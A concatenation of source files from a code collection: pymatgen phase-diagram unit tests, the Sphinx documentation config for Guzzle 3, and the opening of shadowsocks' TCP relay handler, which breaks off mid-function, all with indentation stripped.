entries = EntrySet.from_csv(str(module_dir / "pdentries_test.csv"))
self.assertEqual(entries.chemsys, {'Li', 'Fe', 'O'},
"Wrong elements!")
self.assertEqual(len(entries), 492, "Wrong number of entries!")
class TransformedPDEntryTest(unittest.TestCase):
'''
Test all functions using a ficitious entry
'''
def setUp(self):
comp = Composition("LiFeO2")
entry = PDEntry(comp, 53)
self.transformed_entry = TransformedPDEntry({DummySpecie('Xa'): 1,
DummySpecie("Xb"): 1},
entry)
def test_get_energy(self):
self.assertEqual(self.transformed_entry.energy, 53, "Wrong energy!")
self.assertEqual(self.transformed_entry.original_entry.energy, 53.0)
def test_get_energy_per_atom(self):
self.assertEqual(self.transformed_entry.energy_per_atom, 53.0 / 2)
def test_get_name(self):
self.assertEqual(self.transformed_entry.name, 'LiFeO2', "Wrong name!")
def test_get_composition(self):
comp = self.transformed_entry.composition
expected_comp = Composition({DummySpecie('Xa'): 1,
DummySpecie('Xb'): 1})
self.assertEqual(comp, expected_comp, "Wrong composition!")
def test_is_element(self):
self.assertFalse(self.transformed_entry.is_element)
def test_to_from_dict(self):
d = self.transformed_entry.as_dict()
entry = TransformedPDEntry.from_dict(d)
self.assertEqual(entry.name, 'LiFeO2', "Wrong name!")
self.assertEqual(entry.energy_per_atom, 53.0 / 2)
def test_str(self):
self.assertIsNotNone(str(self.transformed_entry))
class PhaseDiagramTest(unittest.TestCase):
def setUp(self):
self.entries = EntrySet.from_csv(str(module_dir / "pdentries_test.csv"))
self.pd = PhaseDiagram(self.entries)
warnings.simplefilter("ignore")
def tearDown(self):
warnings.simplefilter("default")
def test_init(self):
# Ensure that a bad set of entries raises a PD error. Remove all Li
# from self.entries.
entries = filter(lambda e: (not e.composition.is_element) or
e.composition.elements[0] != Element("Li"),
self.entries)
self.assertRaises(PhaseDiagramError, PhaseDiagram, entries)
def test_dim1(self):
# Ensure that dim 1 PDs can eb generated.
for el in ["Li", "Fe", "O2"]:
entries = [e for e in self.entries
if e.composition.reduced_formula == el]
pd = PhaseDiagram(entries)
self.assertEqual(len(pd.stable_entries), 1)
for e in entries:
decomp, ehull = pd.get_decomp_and_e_above_hull(e)
self.assertGreaterEqual(ehull, 0)
plotter = PDPlotter(pd)
lines, stable_entries, unstable_entries = plotter.pd_plot_data
self.assertEqual(lines[0][1], [0, 0])
def test_stable_entries(self):
stable_formulas = [ent.composition.reduced_formula
for ent in self.pd.stable_entries]
expected_stable = ["Fe2O3", "Li5FeO4", "LiFeO2", "Fe3O4", "Li", "Fe",
"Li2O", "O2", "FeO"]
for formula in expected_stable:
self.assertTrue(formula in stable_formulas,
formula + " not in stable entries!")
def test_get_formation_energy(self):
stable_formation_energies = {ent.composition.reduced_formula:
self.pd.get_form_energy(ent)
for ent in self.pd.stable_entries}
expected_formation_energies = {'Li5FeO4': -164.8117344866667,
'Li2O2': -14.119232793333332,
'Fe2O3': -16.574164339999996,
'FeO': -5.7141519966666685, 'Li': 0.0,
'LiFeO2': -7.732752316666666,
'Li2O': -6.229303868333332,
'Fe': 0.0, 'Fe3O4': -22.565714456666683,
'Li2FeO3': -45.67166036000002,
'O2': 0.0}
for formula, energy in expected_formation_energies.items():
self.assertAlmostEqual(
energy, stable_formation_energies[formula], 7)
def test_all_entries_hulldata(self):
self.assertEqual(len(self.pd.all_entries_hulldata), 492)
def test_planar_inputs(self):
e1 = PDEntry('H', 0)
e2 = PDEntry('He', 0)
e3 = PDEntry('Li', 0)
e4 = PDEntry('Be', 0)
e5 = PDEntry('B', 0)
e6 = PDEntry('Rb', 0)
pd = PhaseDiagram([e1, e2, e3, e4, e5, e6],
map(Element, ['Rb', 'He', 'B', 'Be', 'Li', 'H']))
self.assertEqual(len(pd.facets), 1)
def test_str(self):
self.assertIsNotNone(str(self.pd))
def test_get_e_above_hull(self):
for entry in self.pd.stable_entries:
self.assertLess(self.pd.get_e_above_hull(entry), 1e-11,
"Stable entries should have e above hull of zero!")
for entry in self.pd.all_entries:
if entry not in self.pd.stable_entries:
e_ah = self.pd.get_e_above_hull(entry)
self.assertGreaterEqual(e_ah, 0)
self.assertTrue(isinstance(e_ah, Number))
def test_get_equilibrium_reaction_energy(self):
for entry in self.pd.stable_entries:
self.assertLessEqual(
self.pd.get_equilibrium_reaction_energy(entry), 0,
"Stable entries should have negative equilibrium reaction energy!")
def test_get_decomposition(self):
for entry in self.pd.stable_entries:
self.assertEqual(len(self.pd.get_decomposition(entry.composition)), 1,
"Stable composition should have only 1 decomposition!")
dim = len(self.pd.elements)
for entry in self.pd.all_entries:
ndecomp = len(self.pd.get_decomposition(entry.composition))
self.assertTrue(ndecomp > 0 and ndecomp <= dim,
"The number of decomposition phases can at most be equal to the number of components.")
# Just to test decomp for a ficitious composition
ansdict = {entry.composition.formula: amt
for entry, amt in
self.pd.get_decomposition(Composition("Li3Fe7O11")).items()}
expected_ans = {"Fe2 O2": 0.0952380952380949,
"Li1 Fe1 O2": 0.5714285714285714,
"Fe6 O8": 0.33333333333333393}
for k, v in expected_ans.items():
self.assertAlmostEqual(ansdict[k], v)
def test_get_transition_chempots(self):
for el in self.pd.elements:
self.assertLessEqual(len(self.pd.get_transition_chempots(el)),
len(self.pd.facets))
def test_get_element_profile(self):
for el in self.pd.elements:
for entry in self.pd.stable_entries:
if not (entry.composition.is_element):
self.assertLessEqual(len(self.pd.get_element_profile(el, entry.composition)),
len(self.pd.facets))
expected = [{'evolution': 1.0,
'chempot': -4.2582781416666666,
'reaction': 'Li2O + 0.5 O2 -> Li2O2'},
{'evolution': 0,
'chempot': -5.0885906699999968,
'reaction': 'Li2O -> Li2O'},
{'evolution': -1.0,
'chempot': -10.487582010000001,
'reaction': 'Li2O -> 2 Li + 0.5 O2'}]
result = self.pd.get_element_profile(Element('O'), Composition('Li2O'))
for d1, d2 in zip(expected, result):
self.assertAlmostEqual(d1['evolution'], d2['evolution'])
self.assertAlmostEqual(d1['chempot'], d2['chempot'])
self.assertEqual(d1['reaction'], str(d2['reaction']))
def test_get_get_chempot_range_map(self):
elements = [el for el in self.pd.elements if el.symbol != "Fe"]
self.assertEqual(len(self.pd.get_chempot_range_map(elements)), 10)
def test_getmu_vertices_stability_phase(self):
results = self.pd.getmu_vertices_stability_phase(Composition("LiFeO2"), Element("O"))
self.assertAlmostEqual(len(results), 6)
test_equality = False
for c in results:
if abs(c[Element("O")] + 7.115) < 1e-2 and abs(c[Element("Fe")] + 6.596) < 1e-2 and \
abs(c[Element("Li")] + 3.931) < 1e-2:
test_equality = True
self.assertTrue(test_equality, "there is an expected vertex missing in the list")
def test_getmu_range_stability_phase(self):
results = self.pd.get_chempot_range_stability_phase(
Composition("LiFeO2"), Element("O"))
self.assertAlmostEqual(results[Element("O")][1], -4.4501812249999997)
self.assertAlmostEqual(results[Element("Fe")][0], -6.5961470999999996)
self.assertAlmostEqual(results[Element("Li")][0], -3.6250022625000007)
def test_get_hull_energy(self):
for entry in self.pd.stable_entries:
h_e = self.pd.get_hull_energy(entry.composition)
self.assertAlmostEqual(h_e, entry.energy)
n_h_e = self.pd.get_hull_energy(entry.composition.fractional_composition)
self.assertAlmostEqual(n_h_e, entry.energy_per_atom)
def test_1d_pd(self):
entry = PDEntry('H', 0)
pd = PhaseDiagram([entry])
decomp, e = pd.get_decomp_and_e_above_hull(PDEntry('H', 1))
self.assertAlmostEqual(e, 1)
self.assertAlmostEqual(decomp[entry], 1.0)
def test_get_critical_compositions_fractional(self):
c1 = Composition('Fe2O3').fractional_composition
c2 = Composition('Li3FeO4').fractional_composition
c3 = Composition('Li2O').fractional_composition
comps = self.pd.get_critical_compositions(c1, c2)
expected = [Composition('Fe2O3').fractional_composition,
Composition('Li0.3243244Fe0.1621621O0.51351349'),
Composition('Li3FeO4').fractional_composition]
for crit, exp in zip(comps, expected):
self.assertTrue(crit.almost_equals(exp, rtol=0, atol=1e-5))
comps = self.pd.get_critical_compositions(c1, c3)
expected = [Composition('Fe0.4O0.6'),
Composition('LiFeO2').fractional_composition,
Composition('Li5FeO4').fractional_composition,
Composition('Li2O').fractional_composition]
for crit, exp in zip(comps, expected):
self.assertTrue(crit.almost_equals(exp, rtol=0, atol=1e-5))
def test_get_critical_compositions(self):
c1 = Composition('Fe2O3')
c2 = Composition('Li3FeO4')
c3 = Composition('Li2O')
comps = self.pd.get_critical_compositions(c1, c2)
expected = [Composition('Fe2O3'),
Composition('Li0.3243244Fe0.1621621O0.51351349') * 7.4,
Composition('Li3FeO4')]
for crit, exp in zip(comps, expected):
self.assertTrue(crit.almost_equals(exp, rtol=0, atol=1e-5))
comps = self.pd.get_critical_compositions(c1, c3)
expected = [Composition('Fe2O3'),
Composition('LiFeO2'),
Composition('Li5FeO4') / 3,
Composition('Li2O')]
for crit, exp in zip(comps, expected):
self.assertTrue(crit.almost_equals(exp, rtol=0, atol=1e-5))
# Don't fail silently if input compositions aren't in phase diagram
# Can be very confusing if you're working with a GrandPotentialPD
self.assertRaises(ValueError, self.pd.get_critical_compositions,
Composition('Xe'), Composition('Mn'))
# For the moment, should also fail even if compositions are in the gppd
# because it isn't handled properly
gppd = GrandPotentialPhaseDiagram(self.pd.all_entries, {'Xe': 1},
self.pd.elements + [Element('Xe')])
self.assertRaises(ValueError, gppd.get_critical_compositions,
Composition('Fe2O3'), Composition('Li3FeO4Xe'))
# check that the function still works though
comps = gppd.get_critical_compositions(c1, c2)
expected = [Composition('Fe2O3'),
Composition('Li0.3243244Fe0.1621621O0.51351349') * 7.4,
Composition('Li3FeO4')]
for crit, exp in zip(comps, expected):
self.assertTrue(crit.almost_equals(exp, rtol=0, atol=1e-5))
# case where the endpoints are identical
self.assertEqual(self.pd.get_critical_compositions(c1, c1 * 2),
[c1, c1 * 2])
def test_get_composition_chempots(self):
c1 = Composition('Fe3.1O4')
c2 = Composition('Fe3.2O4.1Li0.01')
e1 = self.pd.get_hull_energy(c1)
e2 = self.pd.get_hull_energy(c2)
cp = self.pd.get_composition_chempots(c1)
calc_e2 = e1 + sum(cp[k] * v for k, v in (c2 - c1).items())
self.assertAlmostEqual(e2, calc_e2)
def test_get_all_chempots(self):
c1 = Composition('Fe3.1O4')
c2 = Composition('FeO')
cp1 = self.pd.get_all_chempots(c1)
cpresult = {Element("Li"): -4.077061954999998,
Element("Fe"): -6.741593864999999,
Element("O"): -6.969907375000003}
for elem, energy in cpresult.items():
self.assertAlmostEqual(cp1['FeO-LiFeO2-Fe3O4'][elem],energy)
cp2 = self.pd.get_all_chempots(c2)
cpresult = {Element("O"): -7.115354140000001,
Element("Fe"): -6.5961471,
Element("Li"): -3.9316151899999987}
for elem, energy in cpresult.items():
self.assertAlmostEqual(cp2['FeO-LiFeO2-Fe'][elem],energy)
def test_to_from_dict(self):
# test round-trip for other entry types such as ComputedEntry
entry = ComputedEntry('H', 0.0, 0.0, entry_id="test")
pd = PhaseDiagram([entry])
d = pd.as_dict()
pd_roundtrip = PhaseDiagram.from_dict(d)
self.assertEqual(pd.all_entries[0].entry_id,
pd_roundtrip.all_entries[0].entry_id)
class GrandPotentialPhaseDiagramTest(unittest.TestCase):
def setUp(self):
self.entries = EntrySet.from_csv(str(module_dir / "pdentries_test.csv"))
self.pd = GrandPotentialPhaseDiagram(self.entries, {Element("O"): -5})
self.pd6 = GrandPotentialPhaseDiagram(self.entries, {Element("O"): -6})
def test_stable_entries(self):
stable_formulas = [ent.original_entry.composition.reduced_formula
for ent in self.pd.stable_entries]
expected_stable = ['Li5FeO4', 'Li2FeO3', 'LiFeO2', 'Fe2O3', 'Li2O2']
for formula in expected_stable:
self.assertTrue(formula in stable_formulas, formula +
" not in stable entries!")
self.assertEqual(len(self.pd6.stable_entries), 4)
def test_get_formation_energy(self):
stable_formation_energies = {
ent.original_entry.composition.reduced_formula:
self.pd.get_form_energy(ent)
for ent in self.pd.stable_entries}
expected_formation_energies = {'Fe2O3': 0.0,
'Li5FeO4': -5.305515040000046,
'Li2FeO3': -2.3424741500000152,
'LiFeO2': -0.43026396250000154,
'Li2O2': 0.0}
for formula, energy in expected_formation_energies.items():
self.assertAlmostEqual(energy, stable_formation_energies[formula],
7, "Calculated formation for " +
formula + " is not correct!")
def test_str(self):
self.assertIsNotNone(str(self.pd))
class CompoundPhaseDiagramTest(unittest.TestCase):
def setUp(self):
self.entries = EntrySet.from_csv(str(module_dir / "pdentries_test.csv"))
self.pd = CompoundPhaseDiagram(self.entries, [Composition("Li2O"),
Composition("Fe2O3")])
def test_stable_entries(self):
stable_formulas = [ent.name for ent in self.pd.stable_entries]
expected_stable = ["Fe2O3", "Li5FeO4", "LiFeO2", "Li2O"]
for formula in expected_stable:
self.assertTrue(formula in stable_formulas)
def test_get_formation_energy(self):
stable_formation_energies = {ent.name:
self.pd.get_form_energy(ent)
for ent in self.pd.stable_entries}
expected_formation_energies = {'Li5FeO4': -7.0773284399999739,
'Fe2O3': 0,
'LiFeO2': -0.47455929750000081,
'Li2O': 0}
for formula, energy in expected_formation_energies.items():
self.assertAlmostEqual(energy, stable_formation_energies[formula],
7)
def test_str(self):
self.assertIsNotNone(str(self.pd))
class ReactionDiagramTest(unittest.TestCase):
def setUp(self):
module_dir = os.path.dirname(os.path.abspath(__file__))
self.entries = list(EntrySet.from_csv(
os.path.join(module_dir, "reaction_entries_test.csv")).entries)
for e in self.entries:
if e.composition.reduced_formula == "VPO5":
entry1 = e
elif e.composition.reduced_formula == "H4(CO)3":
entry2 = e
self.rd = ReactionDiagram(entry1=entry1,
entry2=entry2,
all_entries=self.entries[2:])
def test_get_compound_pd(self):
self.rd.get_compound_pd()
def test_formed_formula(self):
formed_formula = [e.composition.reduced_formula for e in
self.rd.rxn_entries]
expected_formula = [
'V0.12707182P0.12707182H0.0441989C0.03314917O0.66850829',
'V0.125P0.125H0.05C0.0375O0.6625',
'V0.12230216P0.12230216H0.05755396C0.04316547O0.65467626',
'V0.11340206P0.11340206H0.08247423C0.06185567O0.62886598',
'V0.11267606P0.11267606H0.08450704C0.06338028O0.62676056',
'V0.11229947P0.11229947H0.0855615C0.06417112O0.62566845',
'V0.09677419P0.09677419H0.12903226C0.09677419O0.58064516',
'V0.05882353P0.05882353H0.23529412C0.17647059O0.47058824',
'V0.04225352P0.04225352H0.28169014C0.21126761O0.42253521']
for formula in expected_formula:
self.assertTrue(formula in formed_formula)
class PDPlotterTest(unittest.TestCase):
def setUp(self):
entries = list(EntrySet.from_csv(os.path.join(module_dir, "pdentries_test.csv")))
self.pd = PhaseDiagram(entries)
self.plotter = PDPlotter(self.pd, show_unstable=True)
entrieslio = [e for e in entries
if "Fe" not in e.composition]
self.pd_formation = PhaseDiagram(entrieslio)
self.plotter_formation = PDPlotter(self.pd_formation, show_unstable=0.1)
entries.append(PDEntry("C", 0))
self.pd3d = PhaseDiagram(entries)
self.plotter3d = PDPlotter(self.pd3d, show_unstable=0.1)
def test_pd_plot_data(self):
(lines, labels, unstable_entries) = self.plotter.pd_plot_data
self.assertEqual(len(lines), 22)
self.assertEqual(len(labels), len(self.pd.stable_entries),
"Incorrect number of lines generated!")
self.assertEqual(len(unstable_entries),
len(self.pd.all_entries) - len(self.pd.stable_entries),
"Incorrect number of lines generated!")
(lines, labels, unstable_entries) = self.plotter3d.pd_plot_data
self.assertEqual(len(lines), 33)
self.assertEqual(len(labels), len(self.pd3d.stable_entries))
self.assertEqual(len(unstable_entries),
len(self.pd3d.all_entries) - len(self.pd3d.stable_entries))
(lines, labels, unstable_entries) = self.plotter_formation.pd_plot_data
self.assertEqual(len(lines), 3)
self.assertEqual(len(labels), len(self.pd_formation.stable_entries))
def test_get_plot(self):
# Some very basic non-tests. Just to make sure the methods are callable.
self.plotter.get_plot().close()
self.plotter3d.get_plot().close()
self.plotter.get_contour_pd_plot().close()
# self.plotter.get_plot(energy_colormap="Reds", process_attributes=True)
# plt = self.plotter3d.get_plot(energy_colormap="Reds",
# process_attributes=True)
# self.plotter.get_plot(energy_colormap="Reds", process_attributes=False)
# plt = self.plotter3d.get_plot(energy_colormap="Reds",
# process_attributes=False)
self.plotter.get_chempot_range_map_plot([Element("Li"), Element("O")]).close()
self.plotter.plot_element_profile(Element("O"), Composition("Li2O")).close()
class UtilityFunctionTest(unittest.TestCase):
def test_unique_lines(self):
testdata = [[5, 53, 353], [399, 20, 52], [399, 400, 20], [13, 399, 52],
[21, 400, 353], [393, 5, 353], [400, 393, 353],
[393, 400, 399], [393, 13, 5], [13, 393, 399],
[400, 17, 20], [21, 17, 400]]
expected_ans = set([(5, 393), (21, 353), (353, 400), (5, 13), (17, 20),
(21, 400), (17, 400), (52, 399), (393, 399),
(20, 52), (353, 393), (5, 353), (5, 53), (13, 399),
(393, 400), (13, 52), (53, 353), (17, 21),
(13, 393), (20, 399), (399, 400), (20, 400)])
self.assertEqual(uniquelines(testdata), expected_ans)
def test_triangular_coord(self):
coord = [0.5, 0.5]
coord = triangular_coord(coord)
self.assertTrue(np.allclose(coord, [0.75, 0.4330127]))
def test_tet_coord(self):
coord = [0.5, 0.5, 0.5]
coord = tet_coord(coord)
self.assertTrue(np.allclose(coord, [1., 0.57735027, 0.40824829]))
if __name__ == '__main__':
unittest.main()
| mit |
SharpSpring/guzzle3 | docs/conf.py | 469 | 3047 | import sys, os
from sphinx.highlighting import lexers
from pygments.lexers.web import PhpLexer
lexers['php'] = PhpLexer(startinline=True, linenos=1)
lexers['php-annotations'] = PhpLexer(startinline=True, linenos=1)
primary_domain = 'php'
# -- General configuration -----------------------------------------------------
extensions = []
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'Guzzle'
copyright = u'2012, Michael Dowling'
version = '3.0.0'
release = '3.0.0'
exclude_patterns = ['_build']
# -- Options for HTML output ---------------------------------------------------
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "Guzzle documentation"
html_short_title = "Guzzle"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, maps document names to template names.
html_sidebars = {
'**': ['localtoc.html', 'leftbar.html', 'searchbox.html']
}
# Output file base name for HTML help builder.
htmlhelp_basename = 'Guzzledoc'
# -- Guzzle Sphinx theme setup ------------------------------------------------
sys.path.insert(0, '/Users/dowling/projects/guzzle_sphinx_theme')
import guzzle_sphinx_theme
html_translator_class = 'guzzle_sphinx_theme.HTMLTranslator'
html_theme_path = guzzle_sphinx_theme.html_theme_path()
html_theme = 'guzzle_sphinx_theme'
# Guzzle theme options (see theme.conf for more information)
html_theme_options = {
"index_template": "index.html",
"project_nav_name": "Guzzle",
"github_user": "guzzle",
"github_repo": "guzzle",
"disqus_comments_shortname": "guzzle",
"google_analytics_account": "UA-22752917-1"
}
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Guzzle.tex', u'Guzzle Documentation',
u'Michael Dowling', 'manual'),
]
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'guzzle', u'Guzzle Documentation',
[u'Michael Dowling'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Guzzle', u'Guzzle Documentation',
u'Michael Dowling', 'Guzzle', 'One line description of project.',
'Miscellaneous'),
]
| mit |
MarlinL/shadowsocks | shadowsocks/tcprelay.py | 1 | 28451 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2014 clowwindy
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import, division, print_function, \
with_statement
import time
import socket
import errno
import struct
import logging
import traceback
import random
from shadowsocks import encrypt, eventloop, utils, common
from shadowsocks.common import parse_header
# we clear at most TIMEOUTS_CLEAN_SIZE timeouts each time
TIMEOUTS_CLEAN_SIZE = 512
# we check timeouts every TIMEOUT_PRECISION seconds
TIMEOUT_PRECISION = 4
MSG_FASTOPEN = 0x20000000
# SOCKS CMD defination
CMD_CONNECT = 1
CMD_BIND = 2
CMD_UDP_ASSOCIATE = 3
# TCP Relay can be either sslocal or ssserver
# for sslocal it is called is_local=True
# for each opening port, we have a TCP Relay
# for each connection, we have a TCP Relay Handler to handle the connection
# for each handler, we have 2 sockets:
# local: connected to the client
# remote: connected to remote server
# for each handler, we have 2 streams:
# upstream: from client to server direction
# read local and write to remote
# downstream: from server to client direction
# read remote and write to local
# for each handler, it could be at one of several stages:
# sslocal:
# stage 0 SOCKS hello received from local, send hello to local
# stage 1 addr received from local, query DNS for remote
# stage 2 UDP assoc
# stage 3 DNS resolved, connect to remote
# stage 4 still connecting, more data from local received
# stage 5 remote connected, piping local and remote
# ssserver:
# stage 0 just jump to stage 1
# stage 1 addr received from local, query DNS for remote
# stage 3 DNS resolved, connect to remote
# stage 4 still connecting, more data from local received
# stage 5 remote connected, piping local and remote
STAGE_INIT = 0
STAGE_ADDR = 1
STAGE_UDP_ASSOC = 2
STAGE_DNS = 3
STAGE_CONNECTING = 4
STAGE_STREAM = 5
STAGE_DESTROYED = -1
# stream direction
STREAM_UP = 0
STREAM_DOWN = 1
# stream wait status, indicating it's waiting for reading, etc
WAIT_STATUS_INIT = 0
WAIT_STATUS_READING = 1
WAIT_STATUS_WRITING = 2
WAIT_STATUS_READWRITING = WAIT_STATUS_READING | WAIT_STATUS_WRITING
BUF_SIZE = 32 * 1024
class TCPRelayHandler(object):
def __init__(self, server, fd_to_handlers, loop, local_sock, config,
dns_resolver, is_local):
self._server = server
self._fd_to_handlers = fd_to_handlers
self._loop = loop
self._local_sock = local_sock
self._remote_sock = None
self._config = config
self._dns_resolver = dns_resolver
self._is_local = is_local
self._stage = STAGE_INIT
self._encryptor = encrypt.Encryptor(config['password'],
config['method'])
self._fastopen_connected = False
self._data_to_write_to_local = []
self._data_to_write_to_remote = []
self._upstream_status = WAIT_STATUS_READING
self._downstream_status = WAIT_STATUS_INIT
self._remote_address = None
if is_local:
self._chosen_server = self._get_a_server()
fd_to_handlers[local_sock.fileno()] = self
local_sock.setblocking(False)
local_sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
loop.add(local_sock, eventloop.POLL_IN | eventloop.POLL_ERR)
self.last_activity = 0
self._update_activity()
def __hash__(self):
# default __hash__ is id / 16
# we want to eliminate collisions
return id(self)
@property
def remote_address(self):
return self._remote_address
def _get_a_server(self):
server = self._config['server']
server_port = self._config['server_port']
if type(server_port) == list:
server_port = random.choice(server_port)
logging.debug('chosen server: %s:%d', server, server_port)
# TODO support multiple server IP
return server, server_port
def _update_activity(self):
# tell the TCP Relay we have activities recently
# else it will think we are inactive and timed out
self._server.update_activity(self)
def _update_stream(self, stream, status):
# update a stream to a new waiting status
# check if status is changed
# only update if dirty
dirty = False
if stream == STREAM_DOWN:
if self._downstream_status != status:
self._downstream_status = status
dirty = True
elif stream == STREAM_UP:
if self._upstream_status != status:
self._upstream_status = status
dirty = True
if dirty:
if self._local_sock:
event = eventloop.POLL_ERR
if self._downstream_status & WAIT_STATUS_WRITING:
event |= eventloop.POLL_OUT
if self._upstream_status & WAIT_STATUS_READING:
event |= eventloop.POLL_IN
self._loop.modify(self._local_sock, event)
if self._remote_sock:
event = eventloop.POLL_ERR
if self._downstream_status & WAIT_STATUS_READING:
event |= eventloop.POLL_IN
if self._upstream_status & WAIT_STATUS_WRITING:
event |= eventloop.POLL_OUT
self._loop.modify(self._remote_sock, event)
def _write_to_sock(self, data, sock):
# write data to sock
# if only some of the data are written, put remaining in the buffer
# and update the stream to wait for writing
if not data or not sock:
return False
uncomplete = False
try:
l = len(data)
s = sock.send(data)
if s < l:
data = data[s:]
uncomplete = True
except (OSError, IOError) as e:
error_no = eventloop.errno_from_exception(e)
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
uncomplete = True
else:
logging.error(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
return False
if uncomplete:
if sock == self._local_sock:
self._data_to_write_to_local.append(data)
self._update_stream(STREAM_DOWN, WAIT_STATUS_WRITING)
elif sock == self._remote_sock:
self._data_to_write_to_remote.append(data)
self._update_stream(STREAM_UP, WAIT_STATUS_WRITING)
else:
logging.error('write_all_to_sock:unknown socket')
else:
if sock == self._local_sock:
self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
elif sock == self._remote_sock:
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
else:
logging.error('write_all_to_sock:unknown socket')
return True
def _handle_stage_connecting(self, data):
if self._is_local:
data = self._encryptor.encrypt(data)
self._data_to_write_to_remote.append(data)
if self._is_local and not self._fastopen_connected and \
self._config['fast_open']:
# for sslocal and fastopen, we basically wait for data and use
# sendto to connect
try:
# only connect once
self._fastopen_connected = True
remote_sock = \
self._create_remote_socket(self._chosen_server[0],
self._chosen_server[1])
self._loop.add(remote_sock, eventloop.POLL_ERR)
data = b''.join(self._data_to_write_to_remote)
l = len(data)
s = remote_sock.sendto(data, MSG_FASTOPEN, self._chosen_server)
if s < l:
data = data[s:]
self._data_to_write_to_remote = [data]
else:
self._data_to_write_to_remote = []
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) == errno.EINPROGRESS:
# in this case data is not sent at all
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
elif eventloop.errno_from_exception(e) == errno.ENOTCONN:
logging.error('fast open not supported on this OS')
self._config['fast_open'] = False
self.destroy()
else:
logging.error(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
def _handle_stage_addr(self, data):
try:
if self._is_local:
cmd = common.ord(data[1])
if cmd == CMD_UDP_ASSOCIATE:
logging.debug('UDP associate')
if self._local_sock.family == socket.AF_INET6:
header = b'\x05\x00\x00\x04'
else:
header = b'\x05\x00\x00\x01'
addr, port = self._local_sock.getsockname()[:2]
addr_to_send = socket.inet_pton(self._local_sock.family,
addr)
port_to_send = struct.pack('>H', port)
self._write_to_sock(header + addr_to_send + port_to_send,
self._local_sock)
self._stage = STAGE_UDP_ASSOC
# just wait for the client to disconnect
return
elif cmd == CMD_CONNECT:
# just trim VER CMD RSV
data = data[3:]
else:
logging.error('unknown command %d', cmd)
self.destroy()
return
header_result = parse_header(data)
if header_result is None:
raise Exception('can not parse header')
addrtype, remote_addr, remote_port, header_length = header_result
logging.info('connecting %s:%d' % (common.to_str(remote_addr),
remote_port))
self._remote_address = (remote_addr, remote_port)
# pause reading
self._update_stream(STREAM_UP, WAIT_STATUS_WRITING)
self._stage = STAGE_DNS
if self._is_local:
# forward address to remote
self._write_to_sock((b'\x05\x00\x00\x01'
b'\x00\x00\x00\x00\x10\x10'),
self._local_sock)
data_to_send = self._encryptor.encrypt(data)
self._data_to_write_to_remote.append(data_to_send)
# notice here may go into _handle_dns_resolved directly
self._dns_resolver.resolve(self._chosen_server[0],
self._handle_dns_resolved)
else:
if len(data) > header_length:
self._data_to_write_to_remote.append(data[header_length:])
# notice here may go into _handle_dns_resolved directly
self._dns_resolver.resolve(remote_addr,
self._handle_dns_resolved)
except Exception as e:
logging.error(e)
if self._config['verbose']:
traceback.print_exc()
# TODO use logging when debug completed
self.destroy()
def _create_remote_socket(self, ip, port):
addrs = socket.getaddrinfo(ip, port, 0, socket.SOCK_STREAM,
socket.SOL_TCP)
if len(addrs) == 0:
raise Exception("getaddrinfo failed for %s:%d" % (ip, port))
af, socktype, proto, canonname, sa = addrs[0]
remote_sock = socket.socket(af, socktype, proto)
self._remote_sock = remote_sock
self._fd_to_handlers[remote_sock.fileno()] = self
remote_sock.setblocking(False)
remote_sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
return remote_sock
def _handle_dns_resolved(self, result, error):
if error:
logging.error(error)
self.destroy()
return
if result:
ip = result[1]
if ip:
try:
self._stage = STAGE_CONNECTING
remote_addr = ip
if self._is_local:
remote_port = self._chosen_server[1]
else:
remote_port = self._remote_address[1]
if self._is_local and self._config['fast_open']:
# for fastopen:
# wait for more data to arrive and send them in one SYN
self._stage = STAGE_CONNECTING
# we don't have to wait for remote since it's not
# created
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
# TODO when there is already data in this packet
else:
# else do connect
remote_sock = self._create_remote_socket(remote_addr,
remote_port)
try:
remote_sock.connect((remote_addr, remote_port))
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) == \
errno.EINPROGRESS:
pass
self._loop.add(remote_sock,
eventloop.POLL_ERR | eventloop.POLL_OUT)
self._stage = STAGE_CONNECTING
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
